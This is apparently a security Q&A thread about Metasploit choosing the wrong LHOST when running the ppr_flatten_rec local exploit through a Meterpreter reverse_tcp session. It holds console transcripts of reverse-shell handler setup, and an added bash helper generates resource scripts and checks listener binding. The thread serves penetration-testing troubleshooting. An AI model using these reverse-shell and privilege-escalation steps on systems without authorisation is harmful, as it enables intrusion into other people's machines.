Metasploit using the wrong LHOST address

1

When I use Metasploit on an up-to-date Kali Linux rolling release, using exploit/multi/handler with windows/meterpreter/reverse_tcp and then local exploits on the Meterpreter session, the LHOST field is automatically changed to the IP of the Wi-Fi interface, when I actually want to use tap0, which is the VPN interface.

I tried to fix the problem with:

set LHOST <tap0 IP>
setg LHOST <tap0 IP>
set INTERFACE tap0
setg INTERFACE tap0
set interface tap0
set interface tap0

But when I use the run command, the victim tries to connect to my Wi-Fi IP, which obviously is not reachable from the VPN.

I have had this problem for at least 6 months, regardless of when I update Kali or Metasploit. I would appreciate it if someone knows the correct way to configure Metasploit.

[Edit: further details]

Example of the problem:

msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ppr_flatten_rec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(windows/local/ppr_flatten_rec) > run
[*] Started reverse TCP handler on 192.168.85.158:4444

The full context is:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.1:443 
[*] Sending stage (179779 bytes) to 192.168.22.55
[*] Meterpreter session 1 opened (192.168.0.1:443 -> 192.168.22.55:49202) at 2018-01-10 23:27:30 -0500

meterpreter > 
Background session 1? [y/N]  

msf exploit(multi/handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ppr_flatten_rec) > set LHOST **192.168.0.1**
LHOST => 192.168.0.1
msf exploit(windows/local/ppr_flatten_rec) > run

[*] Started reverse TCP handler on **192.168.85.158**:4444 
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system.
[*] Exploit completed, but no session was created.
msf exploit(windows/local/ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.85.158   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
    
posted by Kali User 11.01.2018 - 15:56

1 answer

0

The solution to my problem was explained in Mukesh's comments (many thanks to schroeder for taking the time to help me structure the question better). The solution is to set PAYLOAD again before each local exploit you are going to use.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.0.1:4444 
[*] Sending stage (847604 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.158:57772) at 2018-01-11 16:30:40 -0500

meterpreter > background 
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > set PAYLOAD windows/meterpreter/reverse_tcp  <------- [previously this was missing]
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ppr_flatten_rec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ppr_flatten_rec) > set LPORT 4445
LPORT => 4445
msf exploit(ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.1     yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.1:4445  <----- [Now the IP is the correct one]
    
answered 11.01.2018 - 22:46
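An added example, not part of the original thread: a bash helper that writes the handler setup in the order the answer describes (PAYLOAD before LHOST) and then confirms from `ss -ltn` that the listener really bound to the VPN interface's address rather than the Wi-Fi one. The interface name tap0, the ppr_flatten_rec module and the addresses are taken from the thread; `iface_ip` and `verify_handler` assume iproute2 (`ip`, `ss`) is installed.

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Assumes iproute2 (ip, ss) on Kali.

# Resolve the IPv4 address of an interface, e.g. iface_ip tap0 (live command).
iface_ip() {
  ip -4 -o addr show dev "$1" | awk '{split($4, a, "/"); print a[1]; exit}'
}

# Write a resource script in the order that worked in the thread: in the
# transcript, an LHOST set before PAYLOAD was replaced at run time by the
# auto-detected primary-interface address, so PAYLOAD is set first here.
gen_local_exploit_rc() {  # args: module payload lhost lport session
  local module=$1 payload=$2 lhost=$3 lport=$4 session=$5
  printf 'use %s\n' "$module"
  printf 'set PAYLOAD %s\n' "$payload"
  printf 'set LHOST %s\nset LPORT %s\nset SESSION %s\nrun\n' "$lhost" "$lport" "$session"
}

# Return 0 if the given `ss -ltn` output shows a LISTEN socket on ip:port.
listener_bound() {  # args: ss_output ip port
  printf '%s\n' "$1" | awk -v want="$2:$3" \
    '$1 == "LISTEN" && $4 == want { found = 1 } END { exit (found ? 0 : 1) }'
}

# After `run`, confirm the handler sits on the VPN address (live check).
verify_handler() {  # args: iface port
  local want
  want=$(iface_ip "$1") || return 2
  if listener_bound "$(ss -ltn)" "$want" "$2"; then
    echo "handler bound to $want:$2 ($1)"
  else
    echo "no listener on $want:$2; Metasploit probably picked another interface" >&2
    return 1
  fi
}

# Usage: gen_local_exploit_rc exploit/windows/local/ppr_flatten_rec \
#          windows/meterpreter/reverse_tcp "$(iface_ip tap0)" 4445 1 > ppr.rc
#        msfconsole -r ppr.rc   (then, from another shell: verify_handler tap0 4445)
```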
